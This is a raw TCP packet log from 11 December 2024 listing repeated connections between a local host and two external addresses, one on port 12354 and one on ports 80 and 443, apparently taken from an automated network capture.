                                                      Dec 11, 2024 16:26:48.228718042 CET5624112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:48.233537912 CET1235456239107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:48.233603001 CET5623912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:48.234216928 CET5623912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:48.380559921 CET8056240202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:48.380577087 CET1235456241107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:48.380594015 CET1235456239107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:48.380755901 CET5624080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:48.380789995 CET5624112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:48.381252050 CET5624080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:48.381299019 CET5624112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:48.586986065 CET8056240202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:48.587002993 CET1235456241107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:49.939466953 CET8056240202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:49.940749884 CET5624080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:49.943002939 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:49.943054914 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:49.943200111 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:49.943852901 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:49.943862915 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:50.346721888 CET1235456239107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.346776962 CET5623912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.347342968 CET5623912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.347605944 CET5866912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.466541052 CET1235456239107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.466842890 CET1235458669107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.466912985 CET5866912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.478974104 CET5866912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.486155033 CET1235456241107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.486219883 CET5624112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.486509085 CET5624112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.486922026 CET5875612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.598442078 CET1235458669107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.605844975 CET1235456241107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.606357098 CET1235458756107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:50.606427908 CET5875612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.607491016 CET5875612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:50.726788998 CET1235458756107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:51.642492056 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.642862082 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.643310070 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.643486023 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.648416042 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.648472071 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.648705959 CET44358376202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.648746967 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.649132967 CET58376443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.754720926 CET5624080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.754728079 CET6030280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.874262094 CET8060302202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.874555111 CET6030280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.874584913 CET8056240202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:51.874715090 CET5624080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.874903917 CET6030280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:51.994163036 CET8060302202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:52.127576113 CET5866912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.127599001 CET5875612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.127620935 CET6030280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:52.239866018 CET6081112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.241707087 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:52.242876053 CET6081312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.359409094 CET1235460811107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:52.359493971 CET6081112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.359920025 CET6081112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.361279964 CET8060812202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:52.361344099 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:52.361753941 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:52.362750053 CET1235460813107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:52.362808943 CET6081312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.363107920 CET6081312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:52.479415894 CET1235460811107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:52.481020927 CET8060812202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:52.483310938 CET1235460813107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:53.948319912 CET8060812202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:53.948394060 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:54.013565063 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:54.013608932 CET44362469202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:54.013979912 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:54.014794111 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:54.014805079 CET44362469202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:54.486984968 CET1235460813107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.487041950 CET6081312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.487144947 CET1235460811107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.487185955 CET6081112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.487308979 CET6081312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.487890959 CET6274712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.489830971 CET6081112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.608710051 CET1235460813107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.611363888 CET1235462747107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.611464024 CET6274712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.612427950 CET1235460811107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.634424925 CET6274712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.675228119 CET6275412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.755357027 CET1235462747107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.795216084 CET1235462754107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:54.795305967 CET6275412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.795886993 CET6275412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:54.915884018 CET1235462754107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:55.712435007 CET44362469202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:55.712513924 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.713481903 CET44362469202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:55.713557005 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.717319012 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.717365980 CET44362469202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:55.717406988 CET62469443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.834202051 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.834657907 CET6395080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.955064058 CET8060812202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:55.955128908 CET6081280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.955255985 CET8063950202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:55.955503941 CET6395080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:55.968209982 CET6395080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:56.087640047 CET8063950202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:56.253310919 CET6395080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:56.253329039 CET6274712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.253376007 CET6275412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.254024982 CET6434012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.367240906 CET6441112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.367940903 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:56.373994112 CET1235464340107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:56.374088049 CET6434012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.374541044 CET6434012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.486571074 CET1235464411107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:56.486669064 CET6441112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.486988068 CET6441112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:56.487258911 CET8064412202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:56.487329006 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:56.487802029 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:56.493863106 CET1235464340107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:56.606337070 CET1235464411107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:56.607397079 CET8064412202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:58.059412003 CET8064412202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:58.059484005 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:58.091603041 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:58.091648102 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:58.091700077 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:58.094171047 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:58.094180107 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:58.487782955 CET1235464340107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.487870932 CET6434012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.595953941 CET1235464411107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.596066952 CET6441112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.727897882 CET6434012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.728526115 CET4996112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.728728056 CET6441112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.834651947 CET5000812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.850872040 CET1235464340107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.851533890 CET1235449961107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.851581097 CET1235464411107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.851603031 CET4996112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.852075100 CET4996112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.954020023 CET1235450008107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:58.954253912 CET5000812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.954515934 CET5000812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:26:58.972224951 CET1235449961107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:59.074898005 CET1235450008107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:26:59.795897007 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:59.796004057 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.796997070 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:59.797084093 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.800184011 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.800261021 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:59.800452948 CET44349958202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:26:59.800467968 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.800519943 CET49958443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.911231995 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:26:59.911591053 CET5130780192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.032558918 CET8051307202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:00.032572985 CET8064412202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:00.032646894 CET6441280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.032680035 CET5130780192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.033505917 CET5130780192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.153531075 CET8051307202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:00.267469883 CET5130780192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.267498970 CET4996112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.267695904 CET5000812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.268327951 CET5162712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.385355949 CET5178112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.386740923 CET5178380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.387738943 CET1235451627107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:00.387801886 CET5162712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.388308048 CET5162712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.596820116 CET1235451781107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:00.596836090 CET8051783202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:00.596847057 CET1235451627107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:00.596915960 CET5178380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.596940994 CET5178112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.600512028 CET5178112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:00.600598097 CET5178380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:00.847286940 CET1235451781107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:00.847297907 CET8051783202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:02.176137924 CET8051783202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:02.176197052 CET5178380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:02.195410013 CET52868443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:02.195446968 CET44352868202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:02.195507050 CET52868443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:02.200267076 CET52868443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:02.200288057 CET44352868202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:02.502652884 CET1235451627107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.502711058 CET5162712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.502976894 CET5162712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.503283978 CET5325012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.622370005 CET1235451627107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.622621059 CET1235453250107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.622693062 CET5325012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.623415947 CET5325012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.720974922 CET1235451781107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.721138954 CET5178112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.724160910 CET5178112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.724555016 CET5344912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.743968964 CET1235453250107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.846925020 CET1235451781107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.847446918 CET1235453449107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:02.847543955 CET5344912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.848490000 CET5344912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:02.968996048 CET1235453449107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:03.888331890 CET44352868202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:24.471146107 CET5677512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.586030960 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:24.587464094 CET5692312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.590822935 CET1235456775107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:24.590949059 CET5677512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.591263056 CET5677512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.708410025 CET8056922202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:24.708494902 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:24.709089994 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:24.709963083 CET1235456923107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:24.710079908 CET5692312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.710978985 CET5692312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:24.712815046 CET1235456775107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:24.828409910 CET8056922202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:24.830413103 CET1235456923107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.271668911 CET8056922202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:26.271895885 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:26.276535988 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:26.276578903 CET44358497202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:26.276637077 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:26.277174950 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:26.277193069 CET44358497202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:26.706083059 CET1235456775107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.706537962 CET5677512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.706825018 CET5677512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.707389116 CET5858012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.826971054 CET1235456775107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.826988935 CET1235458580107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.827083111 CET5858012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.827692032 CET5858012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.831512928 CET1235456923107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.832478046 CET5692312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.833492994 CET5692312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.837421894 CET5863912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.950926065 CET1235458580107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.953365088 CET1235456923107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.958801985 CET1235458639107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:26.958877087 CET5863912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:26.959244967 CET5863912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:27.078766108 CET1235458639107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:27.975939035 CET44358497202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:27.976027966 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:27.976990938 CET44358497202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:27.977060080 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:27.980158091 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:27.980243921 CET44358497202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:27.980294943 CET58497443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.107198000 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.107686043 CET5971980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.227293968 CET8059719202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:28.227392912 CET5971980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.227626085 CET8056922202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:28.227683067 CET5692280192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.227788925 CET5971980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.347552061 CET8059719202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:28.486032963 CET5971980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.486064911 CET5858012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.486150980 CET5863912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.487214088 CET6018112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.684212923 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.684756041 CET6034612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.785907984 CET1235460181107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:28.786027908 CET6018112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.823575020 CET6018112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.906299114 CET8060345202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:28.906318903 CET1235460346107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:28.906398058 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.906426907 CET6034612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.906898022 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:28.906995058 CET6034612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:28.943386078 CET1235460181107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:29.027978897 CET8060345202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:29.027992010 CET1235460346107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:30.472453117 CET8060345202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:30.472520113 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:30.477901936 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:30.477957964 CET44362214202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:30.478099108 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:30.479474068 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:30.479494095 CET44362214202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:30.893579960 CET1235460181107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:30.893650055 CET6018112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:30.908493996 CET6018112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:30.908827066 CET6270512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.028556108 CET1235460181107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.028578043 CET1235462705107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.028671980 CET6270512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.035000086 CET1235460346107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.035070896 CET6034612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.048996925 CET6270512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.050018072 CET6034612354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.134879112 CET6271112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.169404030 CET1235462705107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.170669079 CET1235460346107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.256913900 CET1235462711107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:31.257201910 CET6271112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.459775925 CET6271112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:31.580303907 CET1235462711107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:27:32.172594070 CET44362214202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.172669888 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.173392057 CET44362214202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.173435926 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.211666107 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.211743116 CET44362214202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.211836100 CET62214443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.326517105 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.327282906 CET6328980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.446363926 CET8060345202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.446433067 CET6034580192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.446636915 CET8063289202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.446705103 CET6328980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.448138952 CET6328980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.502286911 CET6328980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.502316952 CET6270512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.502321959 CET6271112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.503058910 CET6343412354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:27:32.567394972 CET8063289202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:27:32.567465067 CET6328980192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:27:32.615825891 CET6352912354192.168.2.9107.163.241.204
